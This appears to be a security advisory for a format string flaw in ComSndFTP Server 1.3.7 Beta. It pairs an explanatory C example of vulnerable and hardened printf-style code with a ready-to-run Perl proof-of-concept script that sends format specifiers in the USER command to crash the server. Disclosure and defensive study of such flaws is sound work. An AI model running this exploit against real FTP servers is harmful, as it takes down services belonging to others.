ComSndFTP Server Remote Format String Overflow Exploit

Summary

ComSndFTP Server 1.3.7 Beta Remote Format String Overflow Vulnerability

Credit:

The information has been provided by demonalex.


Details

Vulnerable Systems:
 * ComSndFTP Server 1.3.7 Beta

Bug Description :
ComSndFTP Server is a free FTP server for Windows.
A remote attacker can send a USER command containing any format string, which leads to a denial of service of the FTP service.
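
The bug class described above, shown as an added example (not code from the advisory or from ComSndFTP): the vulnerable printf-style call next to its hardened form, plus a check that counts conversion specifiers in a USER argument for logging or filtering. The function names, the 331 reply text and the assumption that the USER argument reaches a printf-family call as the format are hypothetical; the sample input is constructed.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical handler names and reply text; the server's source is not on this page. */
#ifdef SHOW_VULNERABLE
/* Vulnerable pattern: client text is the format string, so "%s" or "%x"
   make snprintf read arguments that were never passed (crash or leak). */
static int reply_user_vuln(char *out, size_t n, const char *user) {
    return snprintf(out, n, user);
}
#endif

/* Hardened pattern: the format is a constant, the client text is only data. */
static int reply_user_safe(char *out, size_t n, const char *user) {
    return snprintf(out, n, "331 Password required for %s.\r\n", user);
}

/* Copy the argument of "USER <name>\r\n" into name; return 0 on success. */
static int parse_user(const char *line, char *name, size_t n) {
    size_t len;
    if (strncmp(line, "USER ", 5) != 0) return -1;
    line += 5;
    len = strcspn(line, "\r\n");
    if (len == 0 || len >= n) return -1;   /* empty or oversized name */
    memcpy(name, line, len);
    name[len] = '\0';
    return 0;
}

/* Count '%' conversions ("%%" and a trailing '%' are not counted). */
static int count_conversions(const char *s) {
    int hits = 0;
    for (; *s; s++) {
        if (*s != '%') continue;
        if (s[1] == '%') { s++; continue; }
        if (s[1] != '\0') hits++;
    }
    return hits;
}

int main(void) {
    const char *line = "USER %s%p%x%d\r\n";   /* constructed sample input */
    char name[64], reply[128];
    if (parse_user(line, name, sizeof name) != 0) return 1;
    reply_user_safe(reply, sizeof reply, name);
    printf("conversions=%d reply=%s", count_conversions(name), reply);
    return 0;
}
```

With the constant format, the specifiers come back to the client as literal text; the vulnerable variant is compiled only when SHOW_VULNERABLE is defined.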

Proof Of Concept :
-----------------------------------------------------------
#!/usr/bin/perl -w
# ComSndFTP Server Remote Format String Overflow Exploit
# Written by demonalex (at) 163 (dot) com
use IO::Socket;
$|=1;    # unbuffered output
$host=shift || die "$0 \$host \$port\n";
$port=shift || die "$0 \$host \$port\n";
$evil = '%s%p%x%d';    # format specifiers sent as the user name
print 'Launch Attack ... ';
$sock1=IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port, Proto=>'tcp', Timeout=>30) || die "HOST $host PORT $port is down!\n";
if(defined($sock1)){
$sock1->recv($content, 100, 0);    # read the server banner
sleep(2);
$sock1->send('USER '.$evil."\r\n", 0);
sleep(2);
$sock1->recv($content, 100, 0);
sleep(5);
$sock1->close;
}
print "Finish!\n";
exit(1);

Disclosure Timeline:
Published: 2012-06-08
